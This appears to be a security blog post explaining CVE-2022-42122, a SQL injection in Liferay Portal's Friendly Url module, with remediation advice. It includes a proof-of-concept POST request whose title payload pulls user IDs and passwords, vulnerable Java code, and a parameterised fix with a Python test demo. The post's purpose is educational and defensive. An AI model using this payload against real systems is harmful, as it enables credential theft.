CVE-2022-42122 is a serious SQL injection vulnerability found in the Friendly Url module of Liferay Portal 7.3.7 and Liferay DXP (fix pack 2 through update 4). This flaw lets attackers run arbitrary SQL commands on the backend simply by sending a special payload into the title field of a friendly URL. In this post, I'll break it down in plain language, show a sample exploit, and explain how to secure your installation.

What is Liferay Portal?

Liferay Portal is a popular open-source portal framework used by organizations for building web portals, intranet sites, and digital experience platforms (DXP). Like all web software, it processes a lot of user input—including URLs for pages and resources.

What’s Wrong in the Friendly Url Module?

The "Friendly Url" module handles clean, user-friendly URLs for portal pages. In versions 7.3.7 (and DXP 7.3 fix pack 2 through update 4), this feature has a SQL injection vulnerability: the value in the title field of the URL isn't properly filtered before being placed inside a SQL query. That means malicious input can break out of the intended query, letting attackers run their own database commands.

References

- NVD - CVE-2022-42122
- Original Liferay advisory
- Friendly URL Vulnerability Report

Here’s a simplified explanation.

Suppose you have a page with the Friendly URL /home. Liferay stores information about this URL in its database and updates it when you rename the page or add translations. If an attacker crafts a payload that escapes the SQL string context and appends their own command, the database runs that command too. The proof of concept below shows how.

Proof-of-Concept Exploit

Let’s look at a code snippet that shows how this SQL injection could be triggered. Suppose a vulnerable endpoint receives the new title from a POST or GET request:

POST /o/friendly-url/mapping HTTP/1.1
Host: liferay.local
Content-Type: application/json

{
  "title": "test-title'); SELECT userId, password FROM User_ WHERE ('1'='1"
}

On the backend, imagine the (vulnerable) Java code builds the SQL like this:

// Bad practice: direct string concatenation!
String sql = "UPDATE FriendlyURL SET title = '" + title + "' WHERE id = " + id;
statement.execute(sql);

If title is set to:  
test-title'); SELECT userId, password FROM User_ WHERE ('1'='1

Then the constructed SQL query turns into a disaster:

UPDATE FriendlyURL SET title = 'test-title'); SELECT userId, password FROM User_ WHERE ('1'='1' WHERE id = 123

Here, the injected SELECT statement will be executed as a separate command. With that level of access the attacker can:

- Steal user account information, potentially even admin credentials
- Delete important data, causing downtime

This is remote — the attacker just needs to send HTTP requests. There’s no need for prior access!

If you run a vulnerable version

- Upgrade to the latest release or at least to 7.3.7 GA8/DXP 7.3 update 5

Example of Safe Java Code

String query = "UPDATE FriendlyURL SET title = ? WHERE id = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, title); // Safe, parameterized
pstmt.setInt(2, id);
pstmt.executeUpdate();
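To make the difference between the two snippets concrete, here is an added, runnable example (not code from the post or from Liferay) that feeds the proof-of-concept title through both patterns against an in-memory database. Python's sqlite3 module stands in for Liferay's JDBC layer, the FriendlyURL table and its two rows are constructed sample data, and the payload is the one from the request above. Whether a stacked statement actually runs depends on the database driver (sqlite3 refuses multi-statement strings, and the concatenated text is also malformed), so the example reports the driver's verdict rather than assuming; the point it demonstrates holds regardless: with concatenation the title becomes part of the statement, with a bound parameter it is stored verbatim as data and exactly one row changes.

```python
import sqlite3

# Title payload from the post's proof-of-concept request, reused as test input.
PAYLOAD = "test-title'); SELECT userId, password FROM User_ WHERE ('1'='1"


def build_unsafe_sql(title: str, row_id: int) -> str:
    """Mirror the vulnerable concatenation: the title is spliced straight into
    the statement text, so quotes and semicolons in it become SQL syntax."""
    return "UPDATE FriendlyURL SET title = '" + title + "' WHERE id = " + str(row_id)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the FriendlyURL table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE FriendlyURL (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO FriendlyURL (id, title) VALUES (?, ?)",
        [(123, "home"), (124, "about")],
    )
    conn.commit()
    return conn


def update_title_unsafe(conn: sqlite3.Connection, title: str, row_id: int) -> str:
    """Run the concatenated statement. Returns 'executed' or the driver's
    error text so the caller can see what the injected text did."""
    try:
        conn.execute(build_unsafe_sql(title, row_id))
        conn.commit()
        return "executed"
    except (sqlite3.Error, sqlite3.Warning) as exc:
        conn.rollback()
        return "rejected: " + str(exc)


def update_title_safe(conn: sqlite3.Connection, title: str, row_id: int) -> int:
    """Parameterised form of the same update (the PreparedStatement pattern).
    The title travels as a bound value, never as statement text.
    Returns the number of rows changed."""
    cur = conn.execute("UPDATE FriendlyURL SET title = ? WHERE id = ?", (title, row_id))
    conn.commit()
    return cur.rowcount


def fetch_title(conn: sqlite3.Connection, row_id: int) -> str:
    row = conn.execute("SELECT title FROM FriendlyURL WHERE id = ?", (row_id,)).fetchone()
    return row[0]


def demo() -> dict:
    """Exercise both code paths with the payload and report what happened."""
    conn = make_db()
    unsafe_outcome = update_title_unsafe(conn, PAYLOAD, 123)
    changed = update_title_safe(conn, PAYLOAD, 123)
    return {
        "statement_sent_by_unsafe_path": build_unsafe_sql(PAYLOAD, 123),
        "unsafe_outcome": unsafe_outcome,
        "safe_rows_changed": changed,
        "stored_title_after_safe_update": fetch_title(conn, 123),
        "other_row_untouched": fetch_title(conn, 124),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it prints the exact statement string shown earlier in the post for the concatenated path, the driver's rejection of it, and then a single changed row whose stored title is the payload character for character. That last line is the check worth keeping as a regression test in any code that builds friendly URLs: after the fix, hostile-looking titles must round-trip as plain text without touching other rows.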

Final Thoughts

SQL injection is one of the oldest and most dangerous web vulnerabilities. The case of CVE-2022-42122 in Liferay Portal's Friendly Url module is a strong reminder: never trust user input in your code, always use safe query methods, and keep up with security updates.

Further reading

- OWASP SQL Injection Cheat Sheet
- Liferay Portal Downloads
- CVE-2022-42122 on MITRE

If you’re a sysadmin or developer working with Liferay, review your system today. This could save your organization from a damaging breach.

Stay safe online!

*Written exclusively for you by our security team. You may share this post but do not copy its content elsewhere without permission.*

Timeline

Published on: 11/15/2022 01:15:00 UTC
Last modified on: 11/17/2022 15:00:00 UTC